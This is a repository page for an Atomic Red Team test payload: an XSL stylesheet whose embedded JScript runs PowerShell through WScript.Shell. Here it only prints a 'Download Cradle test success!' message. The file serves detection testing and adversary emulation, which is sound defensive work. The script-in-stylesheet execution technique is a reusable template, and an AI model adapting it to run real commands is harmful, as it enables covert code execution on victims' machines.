Files
atomic-red-team/atomics/T1086/payloads/test.xsl
T
Michael Haag f5a5aa8d6a Add Invoke-DownloadCradle by @mgreen27
Added @mgreen27 Invoke-DownloadCradle as method to run additional endpoint and network tests using Powershell.
2018-07-09 12:52:07 -04:00

12 lines
497 B
XML

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("powershell -c \"write-host -ForegroundColor Cyan $(Get-Date -Format s) 'Download Cradle test success!';Read-Host -Prompt 'Press Enter to continue'\"");
]]> </ms:script>
</stylesheet>